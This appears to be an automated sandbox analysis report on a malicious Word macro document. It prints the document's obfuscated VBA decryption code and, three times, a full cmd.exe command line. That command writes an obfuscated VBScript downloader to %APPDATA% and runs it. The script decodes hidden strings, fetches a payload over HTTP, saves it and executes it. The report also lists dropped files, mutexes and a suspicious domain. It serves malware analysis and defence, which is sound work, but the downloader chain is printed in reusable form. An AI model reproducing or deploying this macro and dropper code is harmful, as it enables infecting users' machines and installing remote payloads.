ReDim BZTtv(IKJ(CgB)) As Byte
R1CNthq = 51
Select Case R1CNthq
Case 64
R1CNthq = R1CNthq + 1
Case 78
R1CNthq = R1CNthq + R1CNthq
Case Else
R1CNthq = R1CNthq - 1
End Select
BZTtv = CgB
W2w4p6p = 51
Select Case W2w4p6p
Case 77
W2w4p6p = W2w4p6p + 1
Case 97
W2w4p6p = W2w4p6p + W2w4p6p
Case Else
W2w4p6p = W2w4p6p - 1
End Select
For FCmxt = 0 To (-4857 + 5112)
Ock9y3(FCmxt) = FCmxt
Next FCmxt
TG = 18
Select Case TG
Case 45
TG = TG + 1
Case 10
TG = TG + TG
Case Else
TG = TG - 1
End Select
FCmxt = 0
TY8LM2 = 39
Select Case TY8LM2
Case 80
TY8LM2 = TY8LM2 + 1
Case 28
TY8LM2 = TY8LM2 + TY8LM2
Case Else
TY8LM2 = TY8LM2 - 1
End Select
UzP = 0
X4j = 2
Select Case X4j
Case 5
X4j = X4j + 1
Case 67
X4j = X4j + X4j
Case Else
X4j = X4j - 1
End Select
Q7t = 0
UYa = 73
Select Case UYa
Case 74
UYa = UYa + 1
Case 71
UYa = UYa + UYa
Case Else
UYa = UYa - 1
End Select
For FCmxt = 0 To (619905 / 2431)
UzP = NUKOe((UzP + Ock9y3(FCmxt) + BZTtv(NUKOe(FCmxt, (IKJ(CgB) + 1)))), ((2471424 / 9654)))
LG14 = Ock9y3(FCmxt)
Ock9y3(FCmxt) = Ock9y3(UzP)
Ock9y3(UzP) = LG14
Next FCmxt
CGhP = 19
Select Case CGhP
Case 50
CGhP = CGhP + 1
Case 57
CGhP = CGhP + CGhP
Case Else
CGhP = CGhP - 1
End Select
FCmxt = 0
FhCp = 10
Select Case FhCp
Case 4
FhCp = FhCp + 1
Case 70
FhCp = FhCp + FhCp
Case Else
FhCp = FhCp - 1
End Select
UzP = 0
G5dSGye = 22
Select Case G5dSGye
Case 56
G5dSGye = G5dSGye + 1
Case 79
G5dSGye = G5dSGye + G5dSGye
Case Else
G5dSGye = G5dSGye - 1
End Select
Q7t = 0
QoH6hc = 89
Select Case QoH6hc
Case 91
QoH6hc = QoH6hc + 1
Case 10
QoH6hc = QoH6hc + QoH6hc
Case Else
QoH6hc = QoH6hc - 1
End Select
For FCmxt = 0 To IKJ(Gq)
UzP = NUKOe((UzP + 1), (9013 - 8757))
Q7t = NUKOe((Q7t + Ock9y3(UzP)), (-1451 + 1707))
LG14 = Ock9y3(UzP)
Ock9y3(UzP) = Ock9y3(Q7t)
Ock9y3(Q7t) = LG14
WVEm6(FCmxt) = RPSDiS(WVEm6(FCmxt), (Ock9y3(NUKOe((Ock9y3(UzP) + Ock9y3(Q7t)), ((754944 / 2949))))))
Next FCmxt
QVg3u = 60
Select Case QVg3u
Case 89
QVg3u = QVg3u + 1
Case 75
QVg3u = QVg3u + QVg3u
Case Else
QVg3u = QVg3u - 1
End Select
CBNIP8i = JGT5U(WVEm6)
QJxjQ = 80
Select Case QJxjQ
Case 76
QJxjQ = QJxjQ + 1
Case 42
QJxjQ = QJxjQ + QJxjQ
Case Else
QJxjQ = QJxjQ - 1
End Select
End Function
Private Function JGT5U(A7EBt() As Byte) As String
LPp2BpN = 26
Select Case LPp2BpN
Case 8
LPp2BpN = LPp2BpN + 1
Case 34
LPp2BpN = LPp2BpN + LPp2BpN
Case Else
LPp2BpN = LPp2BpN - 1
End Select
Dim PUw6 As Long
Ygu6L = 72
Select Case Ygu6L
Case 80
Ygu6L = Ygu6L + 1
Case 30
Ygu6L = Ygu6L + Ygu6L
Case Else
Ygu6L = Ygu6L - 1
End Select
For PUw6 = 0 To IKJ(A7EBt)
USo0 = 25
Select Case USo0
Case 68
USo0 = USo0 + 1
Case 37
USo0 = USo0 + USo0
Case Else
USo0 = USo0 - 1
End Select
JGT5U = JGT5U & W55F(A7EBt(PUw6))
SOf = 48
Select Case SOf
Case 66
SOf = SOf + 1
Case 12
SOf = SOf + SOf
Case Else
SOf = SOf - 1
End Select
Next PUw6
Ij46 = 83
Select Case Ij46
Case 72
Ij46 = Ij46 + 1
Case 52
Ij46 = Ij46 + Ij46
Case Else
Ij46 = Ij46 - 1
End Select
End Function
Private Sub NIg()
Ehh = 97
Select Case Ehh
Case 15
Ehh = Ehh + 1
Case 16
Ehh = Ehh + Ehh
Case Else
Ehh = Ehh - 1
End Select
TV0BzB = 26
Select Case TV0BzB
Case 57
TV0BzB = TV0BzB + 1
Case 9
TV0BzB = TV0BzB + TV0BzB
Case Else
TV0BzB = TV0BzB - 1
End Select
End Sub" - source
- Static Parser
- relevance
- 10/10
-
Creates a writable file in a temporary directory
- details
- "WINWORD.EXE" created file "%TEMP%\~DF17F10AB4E6DDDBC1.TMP"
- source
- API Call
- relevance
- 1/10
-
Creates mutants
- details
-
"\Sessions\1\BaseNamedObjects\Local\10MU_ACBPIDS_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Global\552FFA80-3393-423d-8671-7BA046BB5906"
"\Sessions\1\BaseNamedObjects\Local\10MU_ACB10_S-1-5-5-0-60330"
"\Sessions\1\BaseNamedObjects\Local\ZonesCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZoneAttributeCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_Formal1_S-1-5-21-4162757579-3804539371-4239455898-1000"
"\Sessions\1\BaseNamedObjects\Global\MTX_MSO_AdHoc1_S-1-5-21-4162757579-3804539371-4239455898-1000" - source
- Created Mutant
- relevance
- 3/10
-
Loads rich edit control libraries
- details
- "WINWORD.EXE" loaded module "%COMMONPROGRAMFILES%\microsoft shared\OFFICE14\RICHED20.DLL" at 6B640000
- source
- Loaded Module
-
Runs shell commands
- details
-
"/V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip
BXCNxmr" "For Oip = 3 To 2000357" "BXCNxmr = Oipe + 59 + 64 + 48" "Next" "UpR1=50" "End sUb" "SuB P6()" "UjuTSe=52" "EwGZLb=96422237" "VOlHk=88" "fOr MsFa=1 To EwGZLb" "ComMhC=ComMhC+1" "nEXt" "Wz0hpZ=96" "If ComMhC=EwGZLb thEn" "J6Iwr=46" "KklN((-1782+1786))" "FahDO8k=49" "UfYR5N(C5q("214215486A636646004C313C2559145E7E2F265B4E5C3138281803513E","LI6a8P"))" "LgSt=86" "enD If" "PweRTZP=83" "eND suB" "Ok=78" "P6" "suB KklN(Ct7)" "Rt=70" "DiM V3z44" "M48IeHl=67" "V3z44=tiMer+Ct7" "Do WhiLE TIMEr<V3z44" "Loop" "FmfJFkX=46" "eND SuB" "suB WJ()" "GAm=64" "dIM L8
GIw" "CfqzQ=50" "dO WhiLE L8<>2399-2398" "GIw=GIw+1" "Loop" "KO=32" "ENd SuB" "FUnCTION OCL8(C5WeAKJ,RhH)" "F6gWH=26" "DiM V70338G
NELKok
MquhqW4
ARoLF
XFY(5)" "JKLVL5=12" "XFY(5)=52" "WdL=65" "XFY(2)=107" "VGuQs=29" "XFY(3)=50" "Tx=74" "XFY(0)=104" "KcbM=14" "XFY(4)=54" "MHWU7=3" "XFY(1)=100" "T0nC=84" "BH=78" "SEt V70338G=crEateOBjEct(C5q("202C0126033B1A21146135261F2A2036003B16223C2D192A103B", "Os"))" "LzwWOCu=82" "sET NELKok=V70338G.GETfiLE(C5WeAKJ)" "RCkeymC=55" "SEt ARoLF=NELKok.opEnasTexTsTREAM(4099-4098,2858-2858)" "Kb=30" "SeT MquhqW4=V70338G.cREateTEXtFIlE(RhH,6169-6168,7237-7237)" "V4A6Wn=25" "dO UnTIL ARoLF.AteNDOfsTReAM" "MquhqW4.WRiTE Dpa6I(SIaQdx(Dtds6J(ARoLF.REad(4419-4418))
XFY(0)))" "lOop" "Mp5XgB=7" "MquhqW4.CLose" "SqpEda=57" "ARoLF.cLOSE" "N1oqA=11" "EnD funCtiOn" "sUB PeZxmzF(DFTbB)" "Crijd5W=95" "Dim FPiAJMz" "Db5=56" "RvE="LH03"" "Rv=10" "SEt FPiAJMz=CrEaTeOBJECt(C5q("09747C080A1E60383A555221",RvE))" "QGu4Xi6=54" "FPiAJMz.opEn" "UyYE=48" "FPiAJMz.TyPE=442-441" "XFV=49" "FPiAJMz.WrItE DFTbB" "IbEE=44" "FPiAJMz.SaveToFIlE MgWH & C5q("560D081E","CxaOstv")
9121-9119" "Ryh1i5=89" "FPiAJMz.clOse" "OtiDwT=13" "OYw5u" "QifCuY=58" "End sUB" "SUb OYw5u()" "L1=51" "TXsz2=""""" "D3W=52" "R1=MgWH & Ic2Og & C5q("782B6713","EVy3")" "BNUq=96" "JmlZ=C5q("3721316C313430627B0F7511000D0716746E776276","BTLU")" "QIk=85" "OCL8 MgWH & C5q("1A250D1D","Y4IJp")
R1" "Bf=82" "iF Ny="" THen KklN((915-911))" "L7nMFX=15" "YxV31="I1t"" "WOpbfK2=41" "sET MQY=crEatEoBjeCT(C5q("66272A431D39455A1A5911255D",YxV31))" "Odx=95" "MQY.rUn JmlZ & R1 & TXsz2
6397-6397
3340-3340" "BbDH=44" "eND SUb" "FUNctioN C5q(LKbD0x,QUhy5y)" "LZ=21" "diM S5OUdXn
GhI92m
QxE" "Yoo=87" "For S5OUdXn=1 To (leN(LKbD0x)/2)" "GhI92m=(Dpa6I((-3486+3524)) & Dpa6I((343080/4765))&(MId(LKbD0x,(S5OUdXn+S5OUdXn)-1
2)))" "QxE=(Dtds6J(miD(QUhy5y,((S5OUdXn MoD lEn(QUhy5y))+1)
1)))" "C5q=C5q+Dpa6I(SIaQdx(GhI92m,QxE))" "NExt" "KPr=93" "enD fUncTION" "FUnCtion SIaQdx(UF,K4)" "ET=32" "SIaQdx=(UF ANd NOt K4)oR(nOt UF ANd K4)" "Y0=58" "eND FuncTion" "FuNcTion UfYR5N(IWBjR)" "OczshVC=94" "diM Td2
WLa3" "W8oj0Gh=31" "Bz8bR="VS7FS"" "RAg4nr9=86" "On eRror rESume NExt" "PZfR=17" "VnVHG="EJm7d"" "Vsz7=87" "SEt Td2=crEatEObject(C5q("1D3E54162C3A1919372D2F015B",VnVHG))" "Fxyv=65" "Y9iw="CxaOstv"" "SAja" "TS=33" "Set Iiu3v=Td2.ENVironmeNT(C5q("06302A0F030531","FVbeL"))" "X0i6mxo=33" "MgWH=Iiu3v(C5q("72126306721672","B3"))&Dpa6I((1402-1310))& Ic2Og & Ic2Og" "NBSa=47" "WzEa="WIgM"" "L9Pva=67" "SEt WLa3=crEaTeObjECT(C5q("040E2E25261422313D49151A052F190319",WzEa))" "OafZ=60" "WLa3.oPeN C5q("160A3D","XQOijh")
IWBjR
9170-9170" "QGh=16" "WLa3.SEnd()" "Of0e3V8=64" "if WLa3.sTatuS=(749-549) then" "T6Q1k=34" "SAja" "G39k=98" "KklN((12128/3032))" "SiyOlF=98" "PeZxmzF WLa3.RESpONsEBOdY" "PQrK=83" "Else" "DDAByn=88" "CD="DX04vuI"" "Lt6nMZT=66" "seT WLa3= cReATeoBjeCT(C5q("155957041A3A2B3E441A2E38050C0C6464",CD))" "Abin=76" "WLa3.OpeN C5q("721C07","K5YSx9")
C5q("04361832566D43705C7542775B6C546C5E775D6D082318234220052C","Bl" )
5086-5086" "Tqc3=18" "WLa3.sEnD()" "QG0L=8" "If WLa3.STatUS=(1358600/6793)thEn PeZxmzF WLa3.ReSPoNSEbody" "Ya7t=39" "Tce=77" "end if" "BpD7kX=24" "ENd fUnCTioN" "FUNctiON Dpa6I(UvJc)" "YQ9vMhv=34" "Dpa6I=chR(UvJc)" "ALhv=92" "eND FUNCtIon" "FUNCTIoN Ic2Og()" "RcI4YCd=23" "Ic2Og=SEcOND(tIME)" "Krqu5Bu=47" "eNd fUNction") do @echo %~i)>"!VFiOY!" && start "" "!VFiOY!"" on 2016-8-8.07:27:00.751 - source
- Monitored Target
- relevance
- 5/10
-
Spawns new processes
- details
-
Spawned process "cmd.exe" with commandline "/V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip
BXCNxmr" "For Oip = 3 To 2000357" "BXCNxmr = Oipe + 59 + 64 + 48" "Next" "UpR1=50" "End sUb" "SuB P6()" "UjuTSe=52" "EwGZLb=96422237" "VOlHk=88" "fOr MsFa=1 To EwGZLb" "ComMhC=ComMhC+1" "nEXt" "Wz0hpZ=96" "If ComMhC=EwGZLb thEn" "J6Iwr=46" "KklN((-1782+1786))" "FahDO8k=49" "UfYR5N(C5q("214215486A636646004C313C2559145E7E2F265B4E5C3138281803513E","LI6a8P"))" "LgSt=86" "enD If" "PweRTZP=83" "eND suB" "Ok=78" "P6" "suB KklN(Ct7)" "Rt=70" "DiM V3z44" "M48IeHl=67" "V3z44=tiMer+Ct7" "Do WhiLE TIMEr<V3z44" "Loop" "FmfJFkX=46" "eND SuB" "suB WJ()" "GAm=64" "dIM L8
GIw" "CfqzQ=50" "dO WhiLE L8<>2399-2398" "GIw=GIw+1" "Loop" "KO=32" "ENd SuB" "FUnCTION OCL8(C5WeAKJ,RhH)" "F6gWH=26" "DiM V70338G
NELKok
MquhqW4
ARoLF
XFY(5)" "JKLVL5=12" "XFY(5)=52" "WdL=65" "XFY(2)=107" "VGuQs=29" "XFY(3)=50" "Tx=74" "XFY(0)=104" "KcbM=14" "XFY(4)=54" "MHWU7=3" "XFY(1)=100" "T0nC=84" "BH=78" "SEt V70338G=crEateOBjEct(C5q("202C0126033B1A21146135261F2A2036003B16223C2D192A103B", "Os"))" "LzwWOCu=82" "sET NELKok=V70338G.GETfiLE(C5WeAKJ)" "RCkeymC=55" "SEt ARoLF=NELKok.opEnasTexTsTREAM(4099-4098,2858-2858)" "Kb=30" "SeT MquhqW4=V70338G.cREateTEXtFIlE(RhH,6169-6168,7237-7237)" "V4A6Wn=25" "dO UnTIL ARoLF.AteNDOfsTReAM" "MquhqW4.WRiTE Dpa6I(SIaQdx(Dtds6J(ARoLF.REad(4419-4418))
XFY(0)))" "lOop" "Mp5XgB=7" "MquhqW4.CLose" "SqpEda=57" "ARoLF.cLOSE" "N1oqA=11" "EnD funCtiOn" "sUB PeZxmzF(DFTbB)" "Crijd5W=95" "Dim FPiAJMz" "Db5=56" "RvE="LH03"" "Rv=10" "SEt FPiAJMz=CrEaTeOBJECt(C5q("09747C080A1E60383A555221",RvE))" "QGu4Xi6=54" "FPiAJMz.opEn" "UyYE=48" "FPiAJMz.TyPE=442-441" "XFV=49" "FPiAJMz.WrItE DFTbB" "IbEE=44" "FPiAJMz.SaveToFIlE MgWH & C5q("560D081E","CxaOstv")
9121-9119" "Ryh1i5=89" "FPiAJMz.clOse" "OtiDwT=13" "OYw5u" "QifCuY=58" "End sUB" "SUb OYw5u()" "L1=51" "TXsz2=""""" "D3W=52" "R1=MgWH & Ic2Og & C5q("782B6713","EVy3")" "BNUq=96" "JmlZ=C5q("3721316C313430627B0F7511000D0716746E776276","BTLU")" "QIk=85" "OCL8 MgWH & C5q("1A250D1D","Y4IJp")
R1" "Bf=82" "iF Ny="" THen KklN((915-911))" "L7nMFX=15" "YxV31="I1t"" "WOpbfK2=41" "sET MQY=crEatEoBjeCT(C5q("66272A431D39455A1A5911255D",YxV31))" "Odx=95" "MQY.rUn JmlZ & R1 & TXsz2
6397-6397
3340-3340" "BbDH=44" "eND SUb" "FUNctioN C5q(LKbD0x,QUhy5y)" "LZ=21" "diM S5OUdXn
GhI92m
QxE" "Yoo=87" "For S5OUdXn=1 To (leN(LKbD0x)/2)" "GhI92m=(Dpa6I((-3486+3524)) & Dpa6I((343080/4765))&(MId(LKbD0x,(S5OUdXn+S5OUdXn)-1
2)))" "QxE=(Dtds6J(miD(QUhy5y,((S5OUdXn MoD lEn(QUhy5y))+1)
1)))" "C5q=C5q+Dpa6I(SIaQdx(GhI92m,QxE))" "NExt" "KPr=93" "enD fUncTION" "FUnCtion SIaQdx(UF,K4)" "ET=32" "SIaQdx=(UF ANd NOt K4)oR(nOt UF ANd K4)" "Y0=58" "eND FuncTion" "FuNcTion UfYR5N(IWBjR)" "OczshVC=94" "diM Td2
WLa3" "W8oj0Gh=31" "Bz8bR="VS7FS"" "RAg4nr9=86" "On eRror rESume NExt" "PZfR=17" "VnVHG="EJm7d"" "Vsz7=87" "SEt Td2=crEatEObject(C5q("1D3E54162C3A1919372D2F015B",VnVHG))" "Fxyv=65" "Y9iw="CxaOstv"" "SAja" "TS=33" "Set Iiu3v=Td2.ENVironmeNT(C5q("06302A0F030531","FVbeL"))" "X0i6mxo=33" "MgWH=Iiu3v(C5q("72126306721672","B3"))&Dpa6I((1402-1310))& Ic2Og & Ic2Og" "NBSa=47" "WzEa="WIgM"" "L9Pva=67" "SEt WLa3=crEaTeObjECT(C5q("040E2E25261422313D49151A052F190319",WzEa))" "OafZ=60" "WLa3.oPeN C5q("160A3D","XQOijh")
IWBjR
9170-9170" "QGh=16" "WLa3.SEnd()" "Of0e3V8=64" "if WLa3.sTatuS=(749-549) then" "T6Q1k=34" "SAja" "G39k=98" "KklN((12128/3032))" "SiyOlF=98" "PeZxmzF WLa3.RESpONsEBOdY" "PQrK=83" "Else" "DDAByn=88" "CD="DX04vuI"" "Lt6nMZT=66" "seT WLa3= cReATeoBjeCT(C5q("155957041A3A2B3E441A2E38050C0C6464",CD))" "Abin=76" "WLa3.OpeN C5q("721C07","K5YSx9")
C5q("04361832566D43705C7542775B6C546C5E775D6D082318234220052C","Bl" )
5086-5086" "Tqc3=18" "WLa3.sEnD()" "QG0L=8" "If WLa3.STatUS=(1358600/6793)thEn PeZxmzF WLa3.ReSPoNSEbody" "Ya7t=39" "Tce=77" "end if" "BpD7kX=24" "ENd fUnCTioN" "FUNctiON Dpa6I(UvJc)" "YQ9vMhv=34" "Dpa6I=chR(UvJc)" "ALhv=92" "eND FUNCtIon" "FUNCTIoN Ic2Og()" "RcI4YCd=23" "Ic2Og=SEcOND(tIME)" "Krqu5Bu=47" "eNd fUNction") do @echo %~i)>"!VFiOY!" && start "" "!VFiOY!"" (Show Process)
Spawned process "wscript.exe" with commandline ""%APPDATA%\1948.vbs"" (Show Process) - source
- Monitored Target
- relevance
- 3/10
-
Contacts domains
-
Installation/Persistance
-
Dropped files
- details
-
"~WRS{970CBB03-0673-49D2-8698-D021578856D1}.tmp" has type "FoxPro FPT blocks size 0 next free block index 218103808 1st used item "\375""
"index.dat" has type "data"
"data[1].bin" has type "data"
"ExcludeDictionaryEN0409.lex" has type "Little-endian UTF-16 Unicode text with no line terminators"
"00.lGm" has type "data"
"000.RTV" has type "PE32 executable (GUI) Intel 80386 for MS Windows"
"801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.LNK" has type "MS Windows shortcut Item id list present Points to a file or directory Has Relative path Hidden Archive ctime=Mon Aug 8 13:50:22 2016 mtime=Mon Aug 8 13:50:22 2016 atime=Mon Aug 8 22:49:26 2016 length=228864 window=hide"
"~$1ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.doc" has type "data"
"~$Normal.dotm" has type "data"
"1948.vbs" has type "ASCII text with CRLF line terminators"
"~WRS{8D607A42-AAF5-4B6F-895A-2422510A9C4F}.tmp" has type "data" - source
- Binary File
- relevance
- 3/10
-
Dropped files
-
Network Related
-
Found potential URL in binary/memory
- details
-
Pattern match: "http://www.iec.ch"
Pattern match: "http://schemas.openxmlformats.org/drawingml/2006/main"
Pattern match: "http://www.iec.chIEC"
Heuristic match: "pataplouf.com" - source
- File/Memory
- relevance
- 10/10
-
Found potential URL in binary/memory
-
Spyware/Information Retrieval
-
Found a reference to a known community page
- details
- "Writability syringas resurgences overdevotion rezbanyite twittery bidirectionally manifestationist epactal onerousness ballone lophobranchiate dumontite papaloi. Femininity hendecacolic underachieving hounders jesuited overtimed preimagining birma gamogenetically windlessness. Polymorphy undersleep motatorious antirationalistic superfantastic connexion abdicant hantle monobrominated subnote uncontingent nebalian disciplinarianism. Adsorbing unsafeness premourn destool anarchism bosoming astel substanceless crackings endophagous whetting cephalophine knee. Scape sociologism alumna baidarka tasajillos multitask bedewing rotundly nectarized icekhana cabbalas californiana outshot. Gazy imbathe electrogenic rooinek discovert rubine sagginess cacam." (Indicator: "twitter")
- source
- File/Memory
- relevance
- 7/10
-
Found a reference to a known community page
File Details
Tortor PC.contractq01rh.17o-o34u53j.rtf
- Filename
- Tortor PC.contractq01rh.17o-o34u53j.rtf
- Size
- 224KiB (228864 bytes)
- Type
- doc office
- Description
- Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: outjuggling , Template: Normal.dotm, Last Saved By: hedgebote , Revision Number: 4, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jun 3 22:27:00 2016, Last Saved Time/Date: Sun Aug 7 02:10:00 2016, Number of Pages: 1, Number of Words: 9848, Number of Characters: 56136, Security: 0
- Architecture
- WINDOWS
- SHA256
- 801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8
- MD5
- a28c664ba613e41aa35d917e9ef24c00
- SHA1
- 8f4ade42f2a70ee14fd376d3fceed7fba727924b
Classification (TrID)
- 54.2% (.DOC) Microsoft Word document
- 32.2% (.DOC) Microsoft Word document (old ver.)
- 13.5% (.) Generic OLE2 / Multistream Compound File
Screenshots
Loading content, please wait...
Hybrid Analysis
Tip: Click an analysed process below to view more details.
Analysed 3 processes in total (System Resource Monitor).
-
WINWORD.EXE
/n "C:\801ea405250a6dc559ff34cd0157095d37982a806d5498e53a4498c0976301c8.doc"
(PID: 2820)
-
cmd.exe
/V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip, BXCNxmr" "For Oip = 3 To 2000357" "BXCNxmr = Oipe + 59 + 64 + 48" "Next" "UpR1=50" "End sUb" "SuB P6()" "UjuTSe=52" "EwGZLb=96422237" "VOlHk=88" "fOr MsFa=1 To EwGZLb" "ComMhC=ComMhC+1" "nEXt" "Wz0hpZ=96" "If ComMhC=EwGZLb thEn" "J6Iwr=46" "KklN((-1782+1786))" "FahDO8k=49" "UfYR5N(C5q("214215486A636646004C313C2559145E7E2F265B4E5C3138281803513E","LI6a8P"))" "LgSt=86" "enD If" "PweRTZP=83" "eND suB" "Ok=78" "P6" "suB KklN(Ct7)" "Rt=70" "DiM V3z44" "M48IeHl=67" "V3z44=tiMer+Ct7" "Do WhiLE TIMEr<V3z44" "Loop" "FmfJFkX=46" "eND SuB" "suB WJ()" "GAm=64" "dIM L8,GIw" "CfqzQ=50" "dO WhiLE L8<>2399-2398" "GIw=GIw+1" "Loop" "KO=32" "ENd SuB" "FUnCTION OCL8(C5WeAKJ,RhH)" "F6gWH=26" "DiM V70338G,NELKok,MquhqW4,ARoLF,XFY(5)" "JKLVL5=12" "XFY(5)=52" "WdL=65" "XFY(2)=107" "VGuQs=29" "XFY(3)=50" "Tx=74" "XFY(0)=104" "KcbM=14" "XFY(4)=54" "MHWU7=3" "XFY(1)=100" "T0nC=84" "BH=78" "SEt V70338G=crEateOBjEct(C5q("202C0126033B1A21146135261F2A2036003B16223C2D192A103B", "Os"))" "LzwWOCu=82" "sET NELKok=V70338G.GETfiLE(C5WeAKJ)" "RCkeymC=55" "SEt ARoLF=NELKok.opEnasTexTsTREAM(4099-4098,2858-2858)" "Kb=30" "SeT MquhqW4=V70338G.cREateTEXtFIlE(RhH,6169-6168,7237-7237)" "V4A6Wn=25" "dO UnTIL ARoLF.AteNDOfsTReAM" "MquhqW4.WRiTE Dpa6I(SIaQdx(Dtds6J(ARoLF.REad(4419-4418)),XFY(0)))" "lOop" "Mp5XgB=7" "MquhqW4.CLose" "SqpEda=57" "ARoLF.cLOSE" "N1oqA=11" "EnD funCtiOn" "sUB PeZxmzF(DFTbB)" "Crijd5W=95" "Dim FPiAJMz" "Db5=56" "RvE="LH03"" "Rv=10" "SEt FPiAJMz=CrEaTeOBJECt(C5q("09747C080A1E60383A555221",RvE))" "QGu4Xi6=54" "FPiAJMz.opEn" "UyYE=48" "FPiAJMz.TyPE=442-441" "XFV=49" "FPiAJMz.WrItE DFTbB" "IbEE=44" "FPiAJMz.SaveToFIlE MgWH & C5q("560D081E","CxaOstv"),9121-9119" "Ryh1i5=89" "FPiAJMz.clOse" "OtiDwT=13" "OYw5u" "QifCuY=58" "End sUB" "SUb OYw5u()" "L1=51" "TXsz2=""""" "D3W=52" "R1=MgWH & Ic2Og & C5q("782B6713","EVy3")" "BNUq=96" "JmlZ=C5q("3721316C313430627B0F7511000D0716746E776276","BTLU")" "QIk=85" "OCL8 MgWH & C5q("1A250D1D","Y4IJp"),R1" "Bf=82" "iF Ny="" THen KklN((915-911))" "L7nMFX=15" "YxV31="I1t"" "WOpbfK2=41" "sET MQY=crEatEoBjeCT(C5q("66272A431D39455A1A5911255D",YxV31))" "Odx=95" "MQY.rUn JmlZ & R1 & TXsz2,6397-6397,3340-3340" "BbDH=44" "eND SUb" "FUNctioN C5q(LKbD0x,QUhy5y)" "LZ=21" "diM S5OUdXn,GhI92m,QxE" "Yoo=87" "For S5OUdXn=1 To (leN(LKbD0x)/2)" "GhI92m=(Dpa6I((-3486+3524)) & Dpa6I((343080/4765))&(MId(LKbD0x,(S5OUdXn+S5OUdXn)-1,2)))" "QxE=(Dtds6J(miD(QUhy5y,((S5OUdXn MoD lEn(QUhy5y))+1),1)))" "C5q=C5q+Dpa6I(SIaQdx(GhI92m,QxE))" "NExt" "KPr=93" "enD fUncTION" "FUnCtion SIaQdx(UF,K4)" "ET=32" "SIaQdx=(UF ANd NOt K4)oR(nOt UF ANd K4)" "Y0=58" "eND FuncTion" "FuNcTion UfYR5N(IWBjR)" "OczshVC=94" "diM Td2,WLa3" "W8oj0Gh=31" "Bz8bR="VS7FS"" "RAg4nr9=86" "On eRror rESume NExt" "PZfR=17" "VnVHG="EJm7d"" "Vsz7=87" "SEt Td2=crEatEObject(C5q("1D3E54162C3A1919372D2F015B",VnVHG))" "Fxyv=65" "Y9iw="CxaOstv"" "SAja" "TS=33" "Set Iiu3v=Td2.ENVironmeNT(C5q("06302A0F030531","FVbeL"))" "X0i6mxo=33" "MgWH=Iiu3v(C5q("72126306721672","B3"))&Dpa6I((1402-1310))& Ic2Og & Ic2Og" "NBSa=47" "WzEa="WIgM"" "L9Pva=67" "SEt WLa3=crEaTeObjECT(C5q("040E2E25261422313D49151A052F190319",WzEa))" "OafZ=60" "WLa3.oPeN C5q("160A3D","XQOijh"),IWBjR,9170-9170" "QGh=16" "WLa3.SEnd()" "Of0e3V8=64" "if WLa3.sTatuS=(749-549) then" "T6Q1k=34" "SAja" "G39k=98" "KklN((12128/3032))" "SiyOlF=98" "PeZxmzF WLa3.RESpONsEBOdY" "PQrK=83" "Else" "DDAByn=88" "CD="DX04vuI"" "Lt6nMZT=66" "seT WLa3= cReATeoBjeCT(C5q("155957041A3A2B3E441A2E38050C0C6464",CD))" "Abin=76" "WLa3.OpeN C5q("721C07","K5YSx9"),C5q("04361832566D43705C7542775B6C546C5E775D6D082318234220052C","Bl" ),5086-5086" "Tqc3=18" "WLa3.sEnD()" "QG0L=8" "If WLa3.STatUS=(1358600/6793)thEn PeZxmzF WLa3.ReSPoNSEbody" "Ya7t=39" "Tce=77" "end if" "BpD7kX=24" "ENd fUnCTioN" "FUNctiON Dpa6I(UvJc)" "YQ9vMhv=34" "Dpa6I=chR(UvJc)" "ALhv=92" "eND FUNCtIon" "FUNCTIoN Ic2Og()" "RcI4YCd=23" "Ic2Og=SEcOND(tIME)" "Krqu5Bu=47" "eNd fUNction") do @echo %~i)>"!VFiOY!" && start "" "!VFiOY!"
(PID: 3408)
- wscript.exe "%APPDATA%\1948.vbs" (PID: 3196)
-
cmd.exe
/V /C set "VFiOY=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM MgWH" "fUNcTiON Dtds6J(Locu)" "Gu3=46" "Dtds6J=aSC(Locu)" "Mc=34" "EnD fUnCtion" "sUb SAja()" "BhP4Zq9=50" "Dim Oip, BXCNxmr" "For Oip = 3 To 2000357" "BXCNxmr = Oipe + 59 + 64 + 48" "Next" "UpR1=50" "End sUb" "SuB P6()" "UjuTSe=52" "EwGZLb=96422237" "VOlHk=88" "fOr MsFa=1 To EwGZLb" "ComMhC=ComMhC+1" "nEXt" "Wz0hpZ=96" "If ComMhC=EwGZLb thEn" "J6Iwr=46" "KklN((-1782+1786))" "FahDO8k=49" "UfYR5N(C5q("214215486A636646004C313C2559145E7E2F265B4E5C3138281803513E","LI6a8P"))" "LgSt=86" "enD If" "PweRTZP=83" "eND suB" "Ok=78" "P6" "suB KklN(Ct7)" "Rt=70" "DiM V3z44" "M48IeHl=67" "V3z44=tiMer+Ct7" "Do WhiLE TIMEr<V3z44" "Loop" "FmfJFkX=46" "eND SuB" "suB WJ()" "GAm=64" "dIM L8,GIw" "CfqzQ=50" "dO WhiLE L8<>2399-2398" "GIw=GIw+1" "Loop" "KO=32" "ENd SuB" "FUnCTION OCL8(C5WeAKJ,RhH)" "F6gWH=26" "DiM V70338G,NELKok,MquhqW4,ARoLF,XFY(5)" "JKLVL5=12" 